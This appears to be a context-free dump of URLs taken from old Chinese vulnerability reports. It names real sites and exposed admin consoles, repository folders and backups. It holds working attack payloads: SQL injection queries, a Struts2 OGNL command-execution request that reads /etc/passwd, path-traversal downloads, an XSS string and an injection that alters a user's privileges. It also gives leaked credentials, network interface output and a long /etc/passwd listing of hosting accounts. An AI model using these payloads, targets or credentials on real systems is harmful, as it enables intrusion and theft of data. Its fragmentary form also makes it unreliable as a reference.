http://www.tangscan.com/corp.php?action=detail&id=******&auth=a17a2************bb70e&uid=***&taskid=****&page= http://www.tangscan.com/corp.php?action=detail&id=*****&auth=a17a27a4**********70e&uid=***&taskid=****&page= http://www.tangscan.com/corp.php?action=detail&id=*****&auth=a17a27a**********70e&uid=***&taskid=***&page= https://**.**.**.**/liyongqiang/macrowing_crm/blob/master/Source/EDoc2.Crm.Website/Web.config http://**.**.**.**/ http://**.**.**.**/dwr/call/plaincall/UserValidate.isNameExist.dwr http://**.**.**.** http://**.**.**.**/bugs/wooyun-2010-025854 http://**.**.**.**/bbs_detail.asp?id=197 http://**.**.**.**/bbs_detail.asp?id=197 http://**.**.**.**/bbs_detail.asp?id=197 https://111.205.122.237:444/ http://**.**.**.**/message/messageManager/notion_list.jsp?topic_id=144470785089234606130176714333 http://**.**.**.**:7001/logonAction.do http://**.**.**.**/previous_mis/script/bored/list.asp?hnumber=255 http://css.hisense.com/HXCSS/ http://uatcap.ouyeelf.com/cap-admin/login;jsessionid=B984C694E98DBC59546DFF76DF9C10BE http://uatcap.ouyeelf.com/jmx-console/ http://uatcap.ouyeelf.com/web-console http://uatcap.ouyeelf.com/invoker/JMXInvokerServlet http://oa.hupu.com:88/seeyon/ http://**.**.**.**/ajax/ku25_game_login.php?password=1111&username=111*&fromurl=http http://202.98.11.167:7001/ http://202.98.11.167:7001/uddiexplorer/she11.jsp?o=vLogin jdbc:oracle:thin:@10.7.0.115:1521:qmvrr http://eb.e-bridge.com.cn/newebridge/default.jsp http://**.**.**.** http://**.**.**.**/www.zip http://222.92.248.134:88/manage/login http://a8.csimc.com.cn/seeyon/management/index.jsp http://a8.csimc.com.cn/seeyon/logs/login.log http://csair.bluedoor.com.cn:80/ http://scication.swu.edu.cn/article.php?aid=5075&rid=4 http://swjsxyold.swu.edu.cn/show/show.php?id=2044 http://icc.swu.edu.cn/wzxs.php?zdwz=930&cz=xs http://**.**.**.**/UnifiedPublicServicePlatform/navigation.action?to=home_info_techschoolgradcert http://rsc.nenu.edu.cn/news.php?nid=1322 
http://dc.nenu.edu.cn/trend2.php?id=79 http://xsc.nenu.edu.cn/show_news.php?id=415 http://www.library.nenu.edu.cn/DataBase/DataBase_List.aspx?type=B http://**.**.**.**:7001/defaultroot/Logon!logon.action t3://localhost:7001 t3://localhost:7001 http://**.**.**/wh/ user:wangmei pwd:wooyun123 https://**.**.**.**/fidel1216/zhihe/blob/492c935db7b87dab108308cd65a6ac9f73508562/Home/Conf/config.php http://api.weibo.com/webim/2/direct_messages/contacts.json?source=209678993&count=200&add_virtual_user=5,&is_include_group=0&callback=STK_14511436516391 http://119.90.35.101 http://119.90.35.101/users/ http://119.90.35.101/users/Show.aspx http://119.90.35.101/file/ http://119.90.35.101/users/1.aspx http://119.90.35.101/users/Import.aspx encap:Ethernet D8:D3:85:B3:B5:04 dad3:85ff:feb3:b504/64 Scope:Link MTU:1500 packets:628800950 packets:706584025 txqueuelen:1000 https://**.**.**.**/hualiang0537/hlbase/blob/be0cdd552f9d094b2cfabf88db3a24c30ce22e3b/hlbase/src/main/resources/config.properties http://oa.haiboinvest.com/Login.aspx http://180.153.244.156/.svn/entries http://222.73.63.130:7788/.svn/entries http://222.73.63.130:8080/ http://222.73.63.131/ http://222.73.63.131/jhqd/CodeCount.pl http://222.73.63.131/jhqd/ServerCount http://222.73.63.131/jhqd/config.xml http://222.73.63.131/jhqd/ssh_menu http://222.73.63.161 http://222.73.63.133/t.php http://222.73.63.161/phpinfo.php http://222.73.63.161:8080/phpinfo.php http://222.73.63.254/t.php http://app1.chinadaily.com.cn/appdesk/vote/surveypre.shtml http://huawei-microfilm.iqiyi.com/index.php?s=/Home/Index/getPosters/type/poster_type/poster_type/0/page/1 http://wanwan.sina.com.cn/event/sssanguo_2/sg.php http://x.com/test.html?http://wanwan.sina.com.cn/event/sssanguo_2/sg.php http://wanwan.sina.com.cn/event/sssanguo_2/fun.php http://d.72dns.com http://reg.chexun.com/API/PHPUCLogin.ashx?UserName= http://opinion.e23.cn http://**.**.**.**/login.aspx(某科院的网站) http://oa.58ganji.com/ https://sslvpn.ganji.com/,DanaInfo=qudao.corp.ganji.com+ 
https://sslvpn.ganji.com/reject/,DanaInfo=asman.corp.ganji.com+page https://sslvpn.ganji.com/v5/,DanaInfo=audit.corp.ganji.com+ https://sslvpn.ganji.com/v5/HouseComment/,DanaInfo=audit.corp.ganji.com+Auditlist.aspx https://sslvpn.ganji.com/v5/editor/,DanaInfo=audit.corp.ganji.com+AuditPostInfo.aspx?EditorId=123874&BeinDate=2015-12-01&EndDate=2015-12-31&type=0 https://sslvpn.ganji.com/v5/search/,DanaInfo=audit.corp.ganji.com+index.aspx?querytype=6&content=9634102073865117298510&categoryscript=15 http://m.xywy.com/Ig/Index/ajaxPart?is_man=1&part_id=13 http://**.**.**.**/publish.php?Type=&Board_No=28 http://nydl.hit.edu.cn/test/admin/index.asp http://**.**.**.**/list.aspx?stid=5882 http://**.**.**.**/special/2013/sbjszqh/list.aspx?stid=5446&pageid=2 http://**.**.**.**/List.aspx?stid=5781 http://**.**.**.**/quxian/List.aspx?AreaInfoID=119 http://**.**.**.**/pinggu/result.aspx?id=1051 http://**.**.**.**/list.aspx?stid=6041 http://**.**.**.**/list.aspx?stid=6041 http://**.**.**.** http://pgxt.gree.com:7909/hjzx/zzbx/bx.jsp http://**.**.**.**/cn/article.php?id=97 http://**.**.**.**/wwwroot.rar http://www.showcai.com.cn/dwzq_front/index/indexInfo http://www.showcai.com.cn/dwzq_front/resetPassword/getPage?mobile= www.showcai.com.cn http://**.**.**/ http://**.**.**/uddiexplorer/wooyun.jsp http://bbs.crsky.com/thread_sort.php?fid=264&startdate=2015-09-01&enddate=2015-09-26&search=currmon&order=author http://**.**.**.** http://**.**.**.**/include/one_pic.asp?acc_no=1500 http://**.**.**.**/include/one_pic.asp?acc_no=222修改这里的ID数据 http://**.**.**.**/check_user.asp?DepartNo=001000000000 http://**.**.**.**/append_attach.asp?DepartNo=001000000000 http://**.**.**.**/include/show_img.asp?acc_no=1500 http://**.**.**.**/include/one_pic.asp?acc_no=1500 http://**.**.**.**/include/show_img.asp http://**.**.**.**/queren_bx.aspx?d_id=521 http://**.**.**.**/queren_bx.aspx?d_id=520 http://**.**.**.**/pay.aspx?d_id=526 http://**.**.**.**/pay.aspx?d_id=528 
http://**.**.**.**/detail2.jsp?infoid=4028b18e50da3b470150da73d16c0002 http://**.**.**.**/detail2.jsp?infoid=4028b18e50da3b470150da73d16c0002 http://**.**.**.**/detail2.jsp?infoid=4028b18e50da3b470150da73d16c0002 http://**.**.**.** http://api.1hai.cn/ http://www.uimaker.com/designer.php?zy=Flash%B6%AF%BB%AD http://www.essrc.fudan.edu.cn/newsdetail.php?pid=27 http://**.**.**.**/ http://**.**.**.**/mallPortal/ http://**.**.**.** http://**.**.**.**/content/16481 http://**.**.**.**/pages/jsp/copartner/main.jsp http://wap.tigerknows.com/.svn/entries http://news.hitsz.edu.cn/2008.php http://**.**.**.**/newsDetail.php?nid=1596 http://**.**.**.**/newsDetail.php?nid=1596%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT%280x717a6b7871,user%28%29,version%28%29%29,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- http://**.**.**.**/Index-payment-id-10002.html)可通过修改ID为其他任意5位数字查看其他消费者的电话及详细地址,造成隐私泄露。 http://**.**.**.**/efroip/public/chatroom/index.php?cid=1 http://61.142.114.201/ http://61.142.114.203/ http://61.142.114.204/ http://61.142.114.205/ http://61.142.114.197/ http://61.142.114.199/ http://q.yiban.cn/ http://**.**.**.**/news_list.aspx?page=1&news_name=&sorttype= https://github.com/y-h-s/weixin/blob/746cdc510977d7655622c41ae1d7aa5cdddaf758/SpringmvcTest/src/main/resources/mail.properties http://2345.trip8080.com/.svn/entries http://51.trip8080.com/.svn/entries http://mail.cn-healthcare.com/ http://119.254.70.180/ http://wooyun.org/bugs/wooyun-2015-0106070 http://**.**.**.**/ http://**.**.**.**/robots.txt/.php http://**.**.**.**/admin/index.php http://**.**.**.**/phpMyAdmin/setup/sg.php http://**.**.**.**/hkhxg.aspx http://113.106.86.133:800/login/Login.jsp?logintype=1 http://113.106.86.133:800//messager/users.data URL:http://**.**.**.**/Rsdl/dacx.aspx http://**.**.**.**/download?fileName=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F../bin/bash 
http://**.**.**.**/download?fileName=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F../bin/sync http://img.weipai.cn/.svn/entries http://**.**.**.**/ http://oss.cmge.com/login.action?debug=command&expression=%23f=%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29,%23f.setAccessible%28true%29,%23f.set%28%23_memberAccess,true%29,%23req=@org.apache.struts2.ServletActionContext@getRequest%28%29,%23resp=@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29,%23a=%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b=%23a.getInputStream%28%29,%23c=new%20java.io.InputStreamReader%28%23b%29,%23d=new%20java.io.BufferedReader%28%23c%29,%23e=new%20char[1000],%23d.read%28%23e%29,%23resp.println%28%23e%29,%23resp.close%28%29 http://oss.cmge.com/config.jsp encap:Ethernet F8:BC:12:4A:AB:0C addr:123.59.73.98 Bcast:123.59.73.111 Mask:255.255.255.240 fabc:12ff:fe4a:ab0c/64 Scope:Link MTU:1500 packets:234690100 packets:191975833 txqueuelen:1000 http://**.**.**.**/ http://**.**.**.**/console http://**.**.**.**/.git/config http://121.43.145.89/login.html http://sz.breadtrip.com http://222.73.63.161/login.php http://web.breadtrip.com/trips/2387105525 http://**.**.**.**:80/ http://**.**.**.**/discuz/space/?uid=3155 http://broker2.esf.leju.com/statnew/agentreal http://jxj.uestc.edu.cn/Data/resource/backupdata/ http://cemlab.uestc.edu.cn/admin/Session.asp http://xgb.uestc.edu.cn/admin/editor.php http://jxdz.uestc.edu.cn/kindeditor/php/demo.php http://arn.uestc.edu.cn/ckfinder/ckfinder.html http://gfc.twhg.com.tw/top_global_news_b.php?id=36116 http://zchq.cuc.edu.cn/home/StudentHome?Student_Name=1&Student_IDnumber=1 http://61.158.56.15:7001/logonAction.do http://61.158.56.15:7001//b2b/web/fileuploadAction.do?method=downLoad&fileName=web.xml&fileType=application/octet-stream&fjbh=web&fjml=/fileuploadsave/SCFBXX/../../WEB-INF/ 
http://61.158.56.15:7001/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/../../../ http://**.**.**.**/xbnet-si/download/download2.jsp?oldfilename=download2.jsp&down http://**.**.**.**/xbnet-si/download/download2.jsp?oldfilename=download2.jsp&download_file=download2.jsp http://**.**.**.**/xbnet-si/download/download2.jsp?oldfilename=download2.jsp&download_file=download2.jsp http://**.**.**.**/xbnet-si/download/download2.jsp?oldfilename=download2.jsp&download_file=download2.jsp http://**.**.**.**/xbnet-si/download/download2.jsp?oldfilename=download2.jsp&download_file=download2.jsp http://www.wszyjy.sdu.edu.cn/old_version/ http://www.wszyjy.sdu.edu.cn/old_version/upload/wwws.rar http://wap.haoshouwang.com/phone_nanny/model?brand=1 http://log.yifangyun.com:8080/#/dashboard/file/default.json http://ads.roowei.com/.svn/entries http://ph.roowei.com/.svn/entries http://mail.v1.cn/ http://zone.wooyun.org/content/23175 http://pay.g.v1.cn/Z8Ex1iB5/adminLogin http://mp.weixin.qq.com http://cms.diyicai.com/cms/太多弱口令 http://192.168.9.105/ http://192.168.9.105/index.php?ctl=deals&k= http://192.168.9.105/index.php?ctl=deals&k= http://cms.v1cn/ http://221.123.177.63:8086/index.jsp http://www.pumo.com.tw/gb/index.jsp?id=aac4344c33d6f853b3c8a3366f0f1d8d http://**.**.**.**/news/index.do www.zoomeye.org里面搜索: country:China http://map.iyiyun.com随便发布一个地图 http://map.iyiyun.com/Index/infoDetail/id/21513 http://211.160.9.92:7002/ http://211.160.9.92:7002/console/login/LoginForm.jsp user:zhangll pwd:123456 http://ser.foxconn.com/,查看其网页源代码,可看到存在以下js: http://t.womaiapp.com http://**.**.**.**/giftDetail.jsp?giftId=402 http://**.**.**.**/hqglxxxt/Manage/Calendar/FileDown.aspx?id=10012%20AND%201=2%20--%20 http://faq.cetools.cn/采用了中企动力的门户CMS,该cms存在通用的sql注入漏洞, http://**.**.**.**/bugs/wooyun-2015-0150768 http://api.droid4x.cn/ 
http://**.**.**.**/showuser.aspx?orderby=111111&ordertype=%22%3C/script%3E%3Cimg%20src=1%20onerror=alert%281%29%3E&page=1 http://**.**.**.**//space/manage/ajax.aspx?AjaxTemplate=../../admin/usercontrols/ajaxtopicinfo.ascx&poster=1 http://**.**.**.**/space/manage/ajax.aspx?AjaxTemplate=../../admin/usercontrols/ajaxtopicinfo.ascx&poster=1%27%29;declare%20@t%20nvarchar%2840%29%20select%20@t=%28select%20top%201%20name%20from%20sysobjects%20where%20name%20like%27%_users%27%20and%20xtype=%27U%27%29%20exec%28%27update%20%27%2b@t%2b%27%20set%20groupid=2745644%20where%20username=%27%27QQ4856955%27%27%27%29-- http://hd.dwzq.com.cn:2168/ajax/ajaxhandle.ashx?act=checkuser&username=test1[注入点]&t=0.523551341611892 http://**.**.**.** http://**.**.**.**/download.php?file=../../../public_html/download.php http://**.**.**.**/download.php?file=../../../public_html/config/dbconnect.php http://**.**.**.**/ http://**.**.**.**/download.php?fdoc=download.php http://**.**.**.**/download.php?fdoc=index.php http://**.**.**.**/download.php?fdoc=index_c.php http://**.**.**.**/download.php?fdoc=v_index.php http://**.**.**.** http://**.**.**.**/download.php?file=../../public_html/download.php http://**.**.**.**/download.php?file=../../public_html/conn.php http://**.**.**.**/download.php?file=../../../../../../etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin 
rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin avahi-autoipd:x:100:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin diradmin:x:101:104::/usr/local/directadmin:/bin/false mysql:x:102:105:MySQL server:/var/lib/mysql:/bin/false webapps:x:500:500::/var/www/html:/bin/false majordomo:x:103:2::/etc/virtual/majordomo:/bin/false dovecot:x:104:106::/home/dovecot:/bin/false admin:x:501:501::/home/admin:/bin/bash clamav:x:502:502:Clam AntiVirus:/home/clamav:/bin/false evitationn:x:504:504::/home/evitationn:/bin/false nelsonlam:x:506:506::/home/nelsonlam:/bin/false petsfans:x:507:507::/home/petsfans:/bin/false wacecom:x:508:508::/home/wacecom:/bin/false hkctr:x:510:510::/home/hkctr:/bin/false a06outdoor:x:511:511::/home/a06outdoor:/bin/false a259dogcom:x:512:512::/home/a259dogcom:/bin/false a4lumcom:x:514:514::/home/a4lumcom:/bin/false a602sqnorg:x:515:515::/home/a602sqnorg:/bin/false a810hk:x:516:516::/home/a810hk:/bin/false a89268com:x:517:517::/home/a89268com:/bin/false aaronkwanc:x:518:518::/home/aaronkwanc:/bin/false affinityhk:x:520:520::/home/affinityhk:/bin/false agiyam:x:521:521::/home/agiyam:/bin/false ahbunnetdd:x:522:522::/home/ahbunnetdd:/bin/false aisuinfo86:x:523:523::/home/aisuinfo86:/bin/false alliancepl:x:525:525::/home/alliancepl:/bin/false 
alnidvhked:x:526:526::/home/alnidvhked:/bin/false alphaomega:x:527:527::/home/alphaomega:/bin/false alucoicomb:x:528:528::/home/alucoicomb:/bin/false amahk:x:529:529::/home/amahk:/bin/false angelawong:x:530:530::/home/angelawong:/bin/false assetcomhk:x:532:532::/home/assetcomhk:/bin/false awingsstor:x:533:533::/home/awingsstor:/bin/false azoniconce:x:535:535::/home/azoniconce:/bin/false bandrmcom7:x:539:539::/home/bandrmcom7:/bin/false batsaxcomd:x:540:540::/home/batsaxcomd:/bin/false bhjsalumni:x:543:543::/home/bhjsalumni:/bin/false bunnyspace:x:546:546::/home/bunnyspace:/bin/false cardlandhk:x:547:547::/home/cardlandhk:/bin/false cdpchkcom4:x:550:550::/home/cdpchkcom4:/bin/false chuenoucom:x:552:552::/home/chuenoucom:/bin/false coinshk:x:555:555::/home/coinshk:/bin/false computerex:x:556:556::/home/computerex:/bin/false cpchkcom77:x:557:557::/home/cpchkcom77:/bin/false csklcomhk7:x:558:558::/home/csklcomhk7:/bin/false cydhk7eb:x:561:561::/home/cydhk7eb:/bin/false daisymaris:x:562:562::/home/daisymaris:/bin/false derektam:x:564:564::/home/derektam:/bin/false dfshipcom:x:565:565::/home/dfshipcom:/bin/false directprin:x:566:566::/home/directprin:/bin/false dirtbikehk:x:567:567::/home/dirtbikehk:/bin/false dorothytsu:x:568:568::/home/dorothytsu:/bin/false dphkcom:x:569:569::/home/dphkcom:/bin/false easybidjap:x:570:570::/home/easybidjap:/bin/false eottravelc:x:576:576::/home/eottravelc:/bin/false euroasiatr:x:577:577::/home/euroasiatr:/bin/false exoprocomh:x:578:578::/home/exoprocomh:/bin/false firstricho:x:581:581::/home/firstricho:/bin/false focallingc:x:582:582::/home/focallingc:/bin/false frankieche:x:583:583::/home/frankieche:/bin/false freetradeh:x:585:585::/home/freetradeh:/bin/false fuhingnetc:x:586:586::/home/fuhingnetc:/bin/false funfunhome:x:587:587::/home/funfunhome:/bin/false fwicomhka6:x:589:589::/home/fwicomhka6:/bin/false fwlcoscom8:x:590:590::/home/fwlcoscom8:/bin/false gallerycar:x:591:591::/home/gallerycar:/bin/false 
generalsma:x:592:592::/home/generalsma:/bin/false giftattack:x:593:593::/home/giftattack:/bin/false glamourppc:x:594:594::/home/glamourppc:/bin/false goghproduc:x:596:596::/home/goghproduc:/bin/false greaterchi:x:597:597::/home/greaterchi:/bin/false hkacmcomhk:x:600:600::/home/hkacmcomhk:/bin/false hkcagcom6f:x:601:601::/home/hkcagcom6f:/bin/false hkcqbcom0a:x:602:602::/home/hkcqbcom0a:/bin/false hkjcstaffc:x:603:603::/home/hkjcstaffc:/bin/false hkparentsc:x:605:605::/home/hkparentsc:/bin/false hksupreme2:x:606:606::/home/hksupreme2:/bin/false hnhhkcom85:x:607:607::/home/hnhhkcom85:/bin/false househknet:x:610:610::/home/househknet:/bin/false hoyincoma6:x:612:612::/home/hoyincoma6:/bin/false hvaahk945:x:613:613::/home/hvaahk945:/bin/false icecreamus:x:614:614::/home/icecreamus:/bin/false iceocomhkf:x:615:615::/home/iceocomhkf:/bin/false ichinghkad:x:616:616::/home/ichinghkad:/bin/false idphkea8:x:617:617::/home/idphkea8:/bin/false indopacres:x:620:620::/home/indopacres:/bin/false isohkcom13:x:623:623::/home/isohkcom13:/bin/false johnsonspo:x:626:626::/home/johnsonspo:/bin/false kagostudio:x:628:628::/home/kagostudio:/bin/false keenscomhk:x:629:629::/home/keenscomhk:/bin/false keyhouseco:x:630:630::/home/keyhouseco:/bin/false kinsonstud:x:632:632::/home/kinsonstud:/bin/false kitkwongco:x:633:633::/home/kitkwongco:/bin/false kobonetcom:x:634:634::/home/kobonetcom:/bin/false kpcomhke15:x:635:635::/home/kpcomhke15:/bin/false lamto396:x:636:636::/home/lamto396:/bin/false lanaturalb:x:638:638::/home/lanaturalb:/bin/false laplamnet5:x:639:639::/home/laplamnet5:/bin/false leechengin:x:640:640::/home/leechengin:/bin/false leechk766:x:641:641::/home/leechk766:/bin/false leonhartin:x:642:642::/home/leonhartin:/bin/false leotpsorg3:x:643:643::/home/leotpsorg3:/bin/false liberohkco:x:644:644::/home/liberohkco:/bin/false locusdesig:x:645:645::/home/locusdesig:/bin/false lpcorghk86:x:646:646::/home/lpcorghk86:/bin/false lstcymck:x:647:647::/home/lstcymck:/bin/false 
lujahgroup:x:649:649::/home/lujahgroup:/bin/false macaopeopl:x:650:650::/home/macaopeopl:/bin/false macaovoice:x:651:651::/home/macaovoice:/bin/false mafaidesig:x:652:652::/home/mafaidesig:/bin/false magicpoint:x:653:653::/home/magicpoint:/bin/false maxngnetb4:x:654:654::/home/maxngnetb4:/bin/false mayseecomh:x:655:655::/home/mayseecomh:/bin/false milestonec:x:657:657::/home/milestonec:/bin/false mmagicorga:x:659:659::/home/mmagicorga:/bin/false moonspirit:x:661:661::/home/moonspirit:/bin/false mulanhauco:x:662:662::/home/mulanhauco:/bin/false mychairs:x:663:663::/home/mychairs:/bin/false myroomzero:x:665:665::/home/myroomzero:/bin/false neureuterc:x:669:669::/home/neureuterc:/bin/false ngchikitco:x:670:670::/home/ngchikitco:/bin/false ocom8d6:x:672:672::/home/ocom8d6:/bin/false paperhse:x:675:675::/home/paperhse:/bin/false pazucomd00:x:676:676::/home/pazucomd00:/bin/false pennychann:x:677:677::/home/pennychann:/bin/false poshpawsco:x:680:680::/home/poshpawsco:/bin/false qooooocom:x:681:681::/home/qooooocom:/bin/false quartsnet3:x:682:682::/home/quartsnet3:/bin/false rainbowcar:x:683:683::/home/rainbowcar:/bin/false recyclemsc:x:684:684::/home/recyclemsc:/bin/false redsoundco:x:685:685::/home/redsoundco:/bin/false righttimec:x:688:688::/home/righttimec:/bin/false ripabharma:x:689:689::/home/ripabharma:/bin/false rm204comc5:x:690:690::/home/rm204comc5:/bin/false ronaldchen:x:691:691::/home/ronaldchen:/bin/false rwowcomd21:x:693:693::/home/rwowcomd21:/bin/false sdsccomhka:x:695:695::/home/sdsccomhka:/bin/false shoppingth:x:696:696::/home/shoppingth:/bin/false sqkhkabd:x:697:697::/home/sqkhkabd:/bin/false starhscom0:x:698:698::/home/starhscom0:/bin/false starmaxsta:x:699:699::/home/starmaxsta:/bin/false straightco:x:701:701::/home/straightco:/bin/false successpac:x:702:702::/home/successpac:/bin/false takhoineta:x:705:705::/home/takhoineta:/bin/false tdeccomhka:x:706:706::/home/tdeccomhka:/bin/false teamacaune:x:707:707::/home/teamacaune:/bin/false 
tefohkd01:x:708:708::/home/tefohkd01:/bin/false tinwannewt:x:710:710::/home/tinwannewt:/bin/false tradefirst:x:713:713::/home/tradefirst:/bin/false ueihkcom:x:715:715::/home/ueihkcom:/bin/false uniquemaca:x:716:716::/home/uniquemaca:/bin/false vincentchi:x:718:718::/home/vincentchi:/bin/false vitascomhk:x:719:719::/home/vitascomhk:/bin/false weightron:x:721:721::/home/weightron:/bin/false winstonlau:x:722:722::/home/winstonlau:/bin/false wisecarehe:x:724:724::/home/wisecarehe:/bin/false wyxhkfansc:x:727:727::/home/wyxhkfansc:/bin/false ychzcorghk:x:731:731::/home/ychzcorghk:/bin/false yglhkcom17:x:732:732::/home/yglhkcom17:/bin/false ywyancom22:x:734:734::/home/ywyancom22:/bin/false lowb:x:756:756::/home/lowb:/bin/false offside:x:757:757::/home/offside:/bin/false hkctr1:x:768:768::/home/hkctr1:/bin/false gigilam:x:786:786::/home/gigilam:/bin/false ishop1314:x:787:787::/home/ishop1314:/bin/false jojolam:x:788:788::/home/jojolam:/bin/false mschk:x:789:789::/home/mschk:/bin/false ttgin:x:792:792::/home/ttgin:/bin/false unitedadv:x:797:797::/home/unitedadv:/bin/false carsonrack:x:799:799::/home/carsonrack:/bin/false easytech:x:801:801::/home/easytech:/bin/false printeasy:x:807:807::/home/printeasy:/bin/false tinkee:x:808:808::/home/tinkee:/bin/false wace:x:809:809::/home/wace:/bin/false elastiquec:x:814:814::/home/elastiquec:/bin/false citylinkco:x:835:835::/home/citylinkco:/bin/false c9hk:x:840:840::/home/c9hk:/bin/false webdesigne:x:843:843::/home/webdesigne:/bin/false bmwines:x:857:857::/home/bmwines:/bin/false hair163:x:888:888::/home/hair163:/bin/false metta:x:916:916::/home/metta:/bin/false nelson:x:921:921::/home/nelson:/bin/false nomeahk:x:922:922::/home/nomeahk:/bin/false nomeaus:x:924:924::/home/nomeaus:/bin/false nomeawatch:x:925:925::/home/nomeawatch:/bin/false phg:x:929:929::/home/phg:/bin/false pyjewelry:x:931:931::/home/pyjewelry:/bin/false readerfanc:x:932:932::/home/readerfanc:/bin/false splendid:x:948:948::/home/splendid:/bin/false 
steveso1:x:949:949::/home/steveso1:/bin/false steveso2:x:950:950::/home/steveso2:/bin/false steveso3:x:951:951::/home/steveso3:/bin/false touchup:x:955:955::/home/touchup:/bin/false tours:x:956:956::/home/tours:/bin/false ultim8:x:957:957::/home/ultim8:/bin/false usagi:x:958:958::/home/usagi:/bin/false wintex:x:966:966::/home/wintex:/bin/false onlinshop1:x:979:979::/home/onlinshop1:/bin/false onlinshop2:x:982:982::/home/onlinshop2:/bin/false onlinshop4:x:984:984::/home/onlinshop4:/bin/false onlinshop5:x:985:985::/home/onlinshop5:/bin/false poman:x:988:988::/home/poman:/bin/false ricochet:x:989:989::/home/ricochet:/bin/false zemingtea:x:992:992::/home/zemingtea:/bin/false living:x:994:994::/home/living:/bin/false mah:x:996:996::/home/mah:/bin/false soh:x:997:997::/home/soh:/bin/false hair163seo:x:1014:1014::/home/hair163seo:/bin/false moneyworth:x:1026:1026::/home/moneyworth:/bin/false music:x:1027:1027::/home/music:/bin/false nomeaccohk:x:1028:1028::/home/nomeaccohk:/bin/false pulsefitne:x:1029:1029::/home/pulsefitne:/bin/false reducefatc:x:1030:1030::/home/reducefatc:/bin/false seeinart:x:1031:1031::/home/seeinart:/bin/false shapebody:x:1032:1032::/home/shapebody:/bin/false shipping:x:1033:1033::/home/shipping:/bin/false sunflower:x:1034:1034::/home/sunflower:/bin/false tcmakeup:x:1035:1035::/home/tcmakeup:/bin/false virtoffice:x:1036:1036::/home/virtoffice:/bin/false nomoresing:x:1042:1042::/home/nomoresing:/bin/false pvbc2:x:1043:1043::/home/pvbc2:/bin/false webdesigtc:x:1046:1046::/home/webdesigtc:/bin/false theboard:x:1048:1048::/home/theboard:/bin/false lotchware:x:1052:1052::/home/lotchware:/bin/false lotchsuppl:x:1053:1053::/home/lotchsuppl:/bin/false victorps:x:1054:1054::/home/victorps:/bin/false jafoon:x:1059:1059::/home/jafoon:/bin/false cacenter:x:1061:1061::/home/cacenter:/bin/false hos:x:1071:1071::/home/hos:/bin/false grandhealt:x:1078:1078::/home/grandhealt:/bin/false businesspl:x:1079:1079::/home/businesspl:/bin/false 
campbell:x:1094:1094::/home/campbell:/bin/false ecohome:x:1095:1095::/home/ecohome:/bin/false lifecomm:x:1098:1098::/home/lifecomm:/bin/false webdesign:x:1101:1101::/home/webdesign:/bin/false onetechhkc:x:1105:1105::/home/onetechhkc:/bin/false buybusines:x:1115:1115::/home/buybusines:/bin/false movectr2:x:1119:1119::/home/movectr2:/bin/false jacson:x:1132:1132::/home/jacson:/bin/false violin:x:1138:1138::/home/violin:/bin/false greylistd:x:105:107:Greylisting deamon:/var/lib/greylistd:/sbin/nologin onetech:x:1151:1151::/home/onetech:/bin/false forsyth:x:1152:1152::/home/forsyth:/bin/false edendiscus:x:1154:1154::/home/edendiscus:/bin/false gianttesti:x:1157:1157::/home/gianttesti:/bin/false chrishum:x:1158:1158::/home/chrishum:/bin/false food:x:1166:1166::/home/food:/bin/false mffont:x:1177:1177::/home/mffont:/bin/false kinson:x:1178:1178::/home/kinson:/bin/false tkdsystem:x:1179:1179::/home/tkdsystem:/bin/false orionarm:x:1180:1180::/home/orionarm:/bin/false espuma:x:1181:1181::/home/espuma:/bin/false edtkd:x:1182:1182::/home/edtkd:/bin/false cvtower:x:1183:1183::/home/cvtower:/bin/false tamuta:x:1185:1185::/home/tamuta:/bin/false everhonor:x:1186:1186::/home/everhonor:/bin/false shooting5:x:1189:1189::/home/shooting5:/bin/false ball3:x:1191:1191::/home/ball3:/bin/false debts:x:1194:1194::/home/debts:/bin/false neoprohk:x:1195:1195::/home/neoprohk:/bin/false tamodacom:x:1196:1196::/home/tamodacom:/bin/false mental123:x:1197:1197::/home/mental123:/bin/false swgaeashop:x:1198:1198::/home/swgaeashop:/bin/false hangfunghk:x:1199:1199::/home/hangfunghk:/bin/false xmarket:x:1202:1202::/home/xmarket:/bin/false 